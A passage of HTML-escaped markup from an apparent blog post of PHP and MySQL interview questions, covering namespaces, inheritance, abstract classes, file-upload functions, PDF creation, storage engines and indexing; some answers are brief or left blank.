&lt;li class="listitem" style="list-style-type: square; padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;The&amp;nbsp;&lt;span class="function"&gt;&lt;a class="function" href="http://www.php.net/manual/en/function.mail.php" style="background-color: transparent; border-bottom-color: rgb(0, 0, 153); border-bottom-style: solid; border-bottom-width: 1px; text-decoration: none;"&gt;mail()&lt;/a&gt;&lt;/span&gt;&amp;nbsp;function now supports logging of sent email.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;========&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;more details:&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;a href="http://php.net/manual/en/migration53.new-features.php"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: Arial, Helvetica, sans-serif;"&gt;http://php.net/manual/en/migration53.new-features.php&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;5 ) What’s Name spacing ?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div class="simpara" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;In the PHP world, namespaces are designed to solve two problems that authors of libraries and applications encounter when creating re-usable code elements such as classes or functions:&lt;/span&gt;&lt;/div&gt;
&lt;div class="para" style="background-color: white;"&gt;
&lt;/div&gt;
&lt;ol style="background-color: white;" type="1"&gt;
&lt;li class="listitem" style="padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;Name collisions between code you create, and internal PHP classes/functions/constants or third-party classes/functions/constants.&lt;/span&gt;&lt;/li&gt;
&lt;li class="listitem" style="padding-bottom: 3px; padding-top: 3px;"&gt;&lt;span class="simpara" style="font-family: Arial, Helvetica, sans-serif;"&gt;Ability to alias (or shorten) Extra_Long_Names designed to alleviate the first problem, improving readability of source code.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="background-color: white;"&gt;
&lt;/div&gt;
&lt;div class="simpara" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;PHP Namespaces provide a way in which to group related classes, interfaces, functions and constants.&lt;/span&gt;&lt;/div&gt;
&lt;div class="simpara" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="simpara" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;6 ) What are the types of inheritance PHP&amp;nbsp;supports ?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="simpara" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="simpara" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="line-height: 20px;"&gt;Similar to Java, PHP supports single inheritance. There is no multiple inheritance in php. Single inheritance means a class can extend only one parent class.&lt;/span&gt;&lt;br style="line-height: 20px; text-align: left;" /&gt;&lt;br style="line-height: 20px; text-align: left;" /&gt;&lt;span class="Apple-style-span" style="line-height: 20px; text-align: left;"&gt;PHP also has interfaces which can be implemented if bunch of classes need to have similar functionality. An interface can be created containing methods with empty body. Implementing classes then must provide body to those methods.&lt;/span&gt;&lt;br style="line-height: 20px; text-align: left;" /&gt;&lt;br style="line-height: 20px; text-align: left;" /&gt;&lt;span class="Apple-style-span" style="line-height: 20px; text-align: left;"&gt;When a class implements an interface, it is signing up a contract that it will provide implementation to methods declared in that interface.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="simpara" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; text-align: left;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="simpara" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;7 ) What do you mean by an Abstract class and Interface ?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="simpara" style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="simpara" style="background-color: white;"&gt;
&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; line-height: 18px; margin-bottom: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline; word-wrap: break-word;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;Depending on the context, an interface class is either a class of the interface layer or a class whose purpose is to create a contract between a caller and an implementation (usually by providing only purely virtual functions).&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; line-height: 18px; margin-bottom: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline; word-wrap: break-word;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;An abstract class is a class that has at least one purely virtual function.&amp;nbsp;&lt;span class="Apple-style-span" style="line-height: 20px;"&gt;Abstract classes can contain abstract and concrete methods. Abstract classes cannot be instantiated directly i.e. we cannot call the constructor of an abstract class directly nor we can create an instance of an abstract class&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; line-height: 18px; margin-bottom: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline; word-wrap: break-word;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;A static class is a class that has only static member variables and static member functions.&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; line-height: 18px; margin-bottom: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline; word-wrap: break-word;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;======&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;more details:&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.interview-questions-java.com/abstract-class-interface.htm"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: Arial, Helvetica, sans-serif;"&gt;http://www.interview-questions-java.com/abstract-class-interface.htm&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; margin-bottom: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline; word-wrap: break-word;"&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;8 ) When a file is uploaded to the sever how can you check whether its uploaded or not ?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="verinfo" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;(PHP 4 &amp;gt;= 4.0.3, PHP 5)&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="refname"&gt;is_uploaded_file&lt;/span&gt;&amp;nbsp;—&amp;nbsp;&lt;span class="dc-title"&gt;Tells whether the file was uploaded via HTTP POST.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;is_uploaded_file($_FILES['userfile']['tmp_name']);&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;Returns&amp;nbsp;&lt;b&gt;&lt;tt&gt;TRUE&lt;/tt&gt;&lt;/b&gt;&amp;nbsp;on success or&amp;nbsp;&lt;b&gt;&lt;tt&gt;FALSE&lt;/tt&gt;&lt;/b&gt;&amp;nbsp;on failure.&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;9 ) How will you move the uploaded file to another location of server ?&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="refname"&gt;move_uploaded_file&lt;/span&gt;&amp;nbsp;—&amp;nbsp;&lt;span class="dc-title"&gt;Moves an uploaded file to a new location.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;This function checks to ensure that the file designated by&amp;nbsp;&lt;i&gt;&lt;tt class="parameter"&gt;filename&lt;/tt&gt;&lt;/i&gt;&amp;nbsp;is a valid upload file (meaning that it was uploaded via PHP's HTTP POST upload mechanism).&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;If the file is valid, it will be moved to the filename given by&amp;nbsp;&lt;i&gt;&lt;tt class="parameter"&gt;destination&lt;/tt&gt;&lt;/i&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;10 ) What are the things that need to be checked before uploading a file ?&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;Check picture file type and size before file upload..&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;more details:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;a href="http://php.net/manual/en/features.file-upload.php"&gt;http://php.net/manual/en/features.file-upload.php&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;11 ) How will you connect mysql ?&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;12 ) Does PHP supports PDF&amp;nbsp;creation ?&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;The PDF functions in PHP can create PDF files using the PDFlib library which was initially created by Thomas Merz and is now maintained by&amp;nbsp;&lt;/span&gt;&lt;a class="link external" href="http://www.pdflib.com/products/pdflib-family/" style="background-color: white;"&gt;»&amp;nbsp;PDFlib GmbH&lt;/a&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;Starting with PHP 4.0.5, the PHP extension for PDFlib is officially supported by PDFlib GmbH. This means that all the functions described in the PDFlib Reference Manual are supported by PHP 4 with exactly the same meaning and the same parameters.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;13 ) What are the storage types in MySQL ?&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;13.1. The MyISAM Storage Engine[default engine]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;13.2. The InnoDB Storage Engine&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;13.3. The MERGE Storage Engine&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;13.4. The MEMORY (HEAP) Storage Engine&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;13.5. The BDB (BerkeleyDB) Storage Engine&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;13.6. The EXAMPLE Storage Engine&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;13.7. The FEDERATED Storage Engine&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;13.8. The ARCHIVE Storage Engine&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;13.9. The CSV Storage Engine&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;13.10. The BLACKHOLE Storage Engine&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;more details&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="dc-title" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;a href="http://dev.mysql.com/doc/refman/5.0/en/storage-engines.html"&gt;http://dev.mysql.com/doc/refman/5.0/en/storage-engines.html&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;14 ) What is the difference between InnoDb and MyISAM ?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="text-align: -webkit-auto;"&gt;
&lt;/div&gt;
&lt;ul style="background-color: white; line-height: 1.5em; margin-bottom: 1.2em; margin-left: 2em; margin-right: 0px; margin-top: 1.2em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;The big difference between MySQL Table Type MyISAM and InnoDB is that InnoDB supports transaction&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;InnoDB supports some newer features: Transactions, row-level locking, foreign keys&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;InnoDB is for high volume, high performance&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;15 ) Does MyISAM&amp;nbsp;supports relations ?&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;16 ) What’s indexing ?&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;A&amp;nbsp;&lt;/span&gt;&lt;span style="line-height: 19px;"&gt;&lt;i&gt;database index&lt;/i&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;is a&amp;nbsp;&lt;/span&gt;data structure&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;that improves the speed of data retrieval operations on a&amp;nbsp;&lt;/span&gt;database table&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;at the cost of slower writes and increased storage space.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;17 ) MySQL is case sensitive or case insensitive ?&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
